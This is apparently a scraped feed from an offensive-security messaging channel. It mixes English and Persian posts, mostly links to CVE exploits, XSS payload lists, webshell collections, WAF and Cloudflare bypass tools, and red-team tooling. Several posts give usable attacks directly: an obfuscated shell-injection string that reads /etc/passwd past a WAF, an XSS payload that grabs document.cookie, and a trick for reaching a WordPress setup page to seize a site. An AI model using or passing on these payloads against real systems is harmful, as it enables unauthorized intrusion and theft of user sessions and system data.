In This Ceek

بررسی CVEهای پر سر و صدای این هفته (12 تا 18 آذر 1401) + نگاه یکماهه

https://vrgl.ir/n5EsC

#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

💠 جادی رو برای گیت‌هاب استارز کاندید کنید
💠گیت‌هاب، پلتفرم توسعه نرم‌افزار، امسال برنامه‌ای برگزار کرده به عنوان ستارگان گیت‌هاب که در اون الهام‌بخش ترین و تاثیرگذارترین برنامه‌نویسان دنیا رو با توجه به رای مردم معرفی میکنه.
💠جادی رو میتونین با نام کاربری زیر برای کاندیدا معرفی کنین

jadijadi

🔗 https://stars.github.com/nominate

🆔 @Webamoozir

Top 10 macOS Malware Discoveries in 2022

Read

#malware #macOS
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-45025 ( Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Github

#POC #Pdf
——————
0Day.Today
@LearnExploit
@Tech_Army

Filter bypass with regex for OS injection commonly (/"'&|()-;:.,`) block by WAF


E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass endpoint restrictions

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

داده‌های Cloudflare حاکی از آن است که پس از وقوع اعتراضات در ایران و تسری آن به شهرهای مختلف، ترافیک [و استفاده از] اینترنت با وجود مسدودسازی‌های بسیار، رشد انفجاری داشته است. این روند همچنان در حال افزایش است.

منبع : OFFSEC

#iran
——————
0Day.Today
@LearnExploit
@Tech_Army

XSS Payloads :

</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(document.cookie)//>\x3e

#XSS
——————
0Day.Today
@LearnExploit
@Tech_Army

CrimeFlare for bypassing websites protected by CloudFlare WAF

Github

#tools #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Exploiting CVE-2022-42703 ( Bringing back the stack attack )

Read

——————
0Day.Today
@LearnExploit
@Tech_Army

Good wordlist for backup files FUZZ

Github

Github

Github

Github

Github

#Wordlist #passlist
——————
0Day.Today
@LearnExploit
@Tech_Army

Hooking System Calls in Windows 11 22H2 like Avast Antivirus ( Research, analysis and bypass )

Read

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass cloudflare with censys

Youtube

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

8000+ xss_payloads

Github

#xss #payload
——————
0Day.Today
@LearnExploit
@Tech_Army

Large collection of WEBSHELLS

Github

#webshell
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-28672 ( Foxit PDF Reader Remote Code Execution Exploit )

#exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

Super Xray ( Web Vulnerability Scanner )

Github

#scanner #Vulnerability
——————
0Day.Today
@LearnExploit
@Tech_Army

RedTeam Tools

Github

#redteam #tools
——————
0Day.Today
@LearnExploit
@Tech_Army

In This Ceek

بررسی CVEهای پر سر و صدای این هفته (19 تا 25 آذر 1401)

https://vrgl.ir/geTOU

#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

testing 403 bypass ?

You found a /wp-admin with 403 status.

Bypass it using /wp-admin/setup-config.php?step=1

This will allow you to create a database.
From here, you can escalate it to any other big vulnerability

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army